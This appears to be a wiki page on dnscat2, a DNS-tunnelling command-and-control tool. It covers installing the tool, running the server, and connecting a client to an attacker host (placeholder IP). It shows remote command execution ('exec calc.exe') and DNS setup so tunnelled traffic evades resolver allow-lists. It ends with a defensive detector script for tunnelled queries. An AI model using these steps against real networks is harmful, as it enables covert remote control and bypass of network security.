Dnscat
From charlesreid1
Overview
What is it?
dnscat2 is a tool for smuggling connections into secure networks by hiding the connection in DNS queries. It works by running a dnscat2 server and a dnscat2 client, and having the two ends communicate via DNS queries.
There are two ways of running dnscat2:
- In "direct DNS" mode, the client can communicate with the attacker directly as if the attacker were a standard DNS server. This is the simplest setup, but in a more secure network, machines may be restricted to only run DNS queries using explicitly allow-listed DNS servers.
- In "proxy DNS" mode, the client and server can still communicate, but the DNS queries are proxied by another DNS server. This method requires a public DNS entry that points to the dnscat2 server. The client can then send and receive DNS queries to and from the dnscat2 server by using that public domain, and having the DNS queries handled by an intermediary DNS server.
Installing
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
Usage
Direct DNS Mode
Running the server
When you run the server in direct DNS mode, no arguments are required:
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
Now, you can run the client and point to the host running the dnscat2 server. You should see a new session show up on the dnscat2 server side:
# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 12199
dnscat2>
Now, you can attach to that session interactively using its number:
dnscat2> session -i 12199
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 12199]> exec calc.exe
Sent request to execute
dnscat [command: 12199]>
Running the client
On Linux (the client is the compiled dnscat binary built with make in the client/ directory; dnscat2.rb is the server script):
./dnscat --host 101.202.303.404
On Windows:
C:\Users\asdf\Desktop> dnscat2-win32.exe --host 101.202.303.404
Proxy DNS Mode
DNS Setup
The C2 server should be reachable through a registered domain, the domain should have its own authoritative DNS server, and that authoritative DNS server should be the same host running the dnscat2 server.
To make your server authoritative for the domain, tell the domain registrar which nameservers are authoritative for it. There is usually an option for this under Domain Management or Domain Settings.
Edit the DNS zone file and add several records:
- Add two A records, ns1 and ns2, that point to the C2 server's IP address
- Add two NS records with hosts ns1 and ns2 that point to ns1.domain.com and ns2.domain.com
Next, make sure the domain is set up to use your own custom nameservers: add ns1.domain.com and ns2.domain.com as the domain's nameservers. Allow some time for the settings to propagate.
Now, when you run dnscat2 on either end (server or client), you specify domain.com as the domain instead of a host and port.
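In proxy DNS mode the tunnel's queries pass through the network's allow-listed resolver, which is where a defender can see them: one client issuing many distinct, long, high-entropy subdomains under a single zone. The following detector is an added example, not part of this page or of the dnscat2 project; it runs over a constructed resolver log (the format "<client> <qtype> <qname>" and the thresholds are assumptions).

```python
import math
from collections import defaultdict

# Constructed sample resolver log (not real traffic): "<client> <qtype> <qname>".
# The four domain.com lines mimic the shape of tunnelled queries that a client
# pointed at domain.com would generate; the example.org lines are benign.
SAMPLE_LOG = """\
10.0.0.5 A www.example.org
10.0.0.5 A a-very-long-but-readable-hostname-for-testing.example.org
10.0.0.7 TXT 1234567890abcdef.fedcba0987654321.domain.com
10.0.0.7 TXT 0f1e2d3c4b5a6978.8796a5b4c3d2e1f0.domain.com
10.0.0.7 CNAME a1b2c3d4e5f60798.8796f0e5d4c3b2a1.domain.com
10.0.0.7 MX fedcba9876543210.0123456789abcdef.domain.com
10.0.0.5 A mail.example.org
"""

def shannon_entropy(s):
    """Bits per character; an encoded payload sits near its alphabet's maximum."""
    n = len(s)
    if n == 0:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname, zone_labels=2):
    """'a.b.domain.com' -> ('a.b', 'domain.com'). Taking the last two labels as
    the zone is a simplification; a real deployment would use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])

def find_tunnel_candidates(log_text, min_unique=3, min_entropy=3.0, min_len=30):
    """Return (client, zone) pairs whose long subdomains are both numerous and
    high-entropy. Entropy alone is a weak signal (a readable hostname can score
    high too), so the count of distinct subdomains is what separates a tunnel
    from a single odd-looking lookup."""
    per_pair = defaultdict(list)  # (client, zone) -> [(subdomain, entropy), ...]
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        client, _qtype, qname = parts
        sub, zone = split_qname(qname)
        if len(sub) >= min_len:
            per_pair[(client, zone)].append((sub, shannon_entropy(sub.replace(".", ""))))
    hits = []
    for (client, zone), rows in per_pair.items():
        unique = {sub for sub, _ in rows}
        avg = sum(e for _, e in rows) / len(rows)
        if len(unique) >= min_unique and avg >= min_entropy:
            hits.append({"client": client, "zone": zone,
                         "unique_subdomains": len(unique), "avg_entropy": round(avg, 2)})
    return hits
```

Running find_tunnel_candidates(SAMPLE_LOG) flags only 10.0.0.7 against domain.com; the long but readable example.org name is not flagged because it appears just once.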
Resources
https://zeltser.com/c2-dns-tunneling/
Github: https://github.com/iagox86/dnscat2